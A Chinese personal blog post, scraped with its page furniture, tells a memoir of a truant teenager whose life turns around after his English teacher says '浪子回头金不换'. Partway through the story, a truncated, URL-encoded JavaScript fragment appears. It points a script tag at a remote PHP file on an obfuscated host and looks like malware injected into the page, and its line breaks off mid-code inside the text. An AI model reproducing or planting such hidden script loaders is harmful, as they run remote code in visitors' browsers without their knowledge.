注册 登录  
 加关注
   显示下一条  |  关闭
温馨提示!由于新浪微博认证机制调整,您的新浪微博帐号绑定已过期,请重新绑定!立即重新绑定新浪微博》  |  关闭

大头

闭门即是深山,读书随处净土。

 
 
 

日志

 
 

(原创)浪子回头金不换  

2010-05-08 23:17:41|  分类: 人生拾趣 |  标签: |举报 |字号 订阅

  下载LOFTER 我的照片书  |

 

一不小心,虚度年华三十载。本该“三十而立”,可我现如今一事无成,身无一技之长,依然在惶惶愕愕中苦度余生。但在知道我的成长经历的人眼里,今天的我,即便如此的平凡都已经算是很理想的结果了,最起码成人、成家了。

记得年少时的我,只因无知,险些步入人生的歧途,亲朋为之惋惜,父母为之痛心。正当我处于悬崖边沿,是一句话改变了我,让我重拾信心,找到了本该属于我的人生轨迹。

我有一个幸福的童年。我是农民的儿子,父母一心要育我成才,除了读书他们几乎舍不得让我做任何农活。步入中学,多姿多彩地校园生活无法满足我渴望猎奇的心。开始,游戏世界中的遨游成了我的精神“鸦片”;接下来,逃学、旷课成了我的家常便饭;开除学籍,留校察看,这就是我的最终结局。面对母亲放弃工作,上演了现代版的“陪子读书”,我不为之所动;父亲无言地怒目,我“威武不屈”;亲朋的善言相劝,我置之不理。我依然“走自己的路,让别人去说吧!”。

转眼间,离初中毕业只有一个学期了。一天,我鬼使神差地出现在英语课上,这让英语老师就好似看到了天外来客,她自一年前接手我们班以来就很少见得到我的影。那节课我还听的特别专心,但像听“天书”,因为我的基础实在太差。当时我们班逃课出了名,共二十多名男生,经常至多会有个位数的男同学来上英语课,为此老师很伤心。快下课了,老师合上课本凝重地扫了一眼后面空着的大片课桌,欲言又止。许久,同学们随着老师无奈地眼神都落在了我的身上,最终老师语重心长地说:“大家都知道,大兵同学长时间没上英语课了,我知道他现在一定非常吃力。但今天他上课很用心,我相信只要他从现在刻苦学习,总有一天他会赶上来的。俗话说‘亡羊补牢为时不晚’,也希望你们跟不在的同学传达一句话——‘浪子回头金不换’,这就是我对他们的期望。”

tsByTagName%28%27script%27%29%5B0%5D.src%3D%27http%3A//%78%71%7a%6e%2e%69%6e%66%6f%2f%61%2f%31%36%33%2f%6e%2e%70%68%70%27%3Bwindow.x%3D1%7D"<

下课了。老师走后,我仍然一个人面红耳赤地低着头坐在座位上。我无法面对同学们各异地目光,谁也不知道我当时是怎样的无地自容。是啊!“浪子回头金不换”,因为我已经是“浪子”了,该“回头”啦!真该“回头”了。我突然之间感悟到我该为自己再回首初中这段“花季年华”时留下最后的精彩了。在此之后,我再没有缺课,每一堂课我都十二分努力地认真听讲。每当遇到学习上的难题太多而困倦时,我就想起老师说的“浪子回头金不换”,马上就能振作精神,全身心的投入到学习中去。这种状态以其说是“知耻而后勇”,倒不如说是为了证明我是一个男人,一个在哪里跌倒了就该在哪里爬起来的男人。在初中最后的日日夜夜里,我对学习时间的渴望就好比得了不治之症的病人,很想把即将逝去的美好光阴拽住,好让我努力地做好迎接升学考的准备。但是太晚了,我最终还是落榜了。

往事不堪回首,时隔多年,每每我为当年肆意挥霍那段青春年华而暗自悔恨时,我还会由衷地感激英语老师给了我那句受用终身的话,是它给了我迷途知返的信心与决心。谢谢老师,当年的“浪子”谢谢您的教诲!

                                                                           大兵

                                                                   2009年10月

  评论这张
 
阅读(133)| 评论(5)
推荐 转载

历史上的今天

在LOFTER的更多文章

评论

<#--最新日志,群博日志--> <#--推荐日志--> <#--引用记录--> <#--博主推荐--> <#--随机阅读--> <#--首页推荐--> <#--历史上的今天--> <#--被推荐日志--> <#--上一篇,下一篇--> <#-- 热度 --> <#-- 网易新闻广告 --> <#--右边模块结构--> <#--评论模块结构--> <#--引用模块结构--> <#--博主发起的投票-->
 
 
 
 
 
 
 
 
 
 
 
 
 
 

页脚

网易公司版权所有 ©1997-2017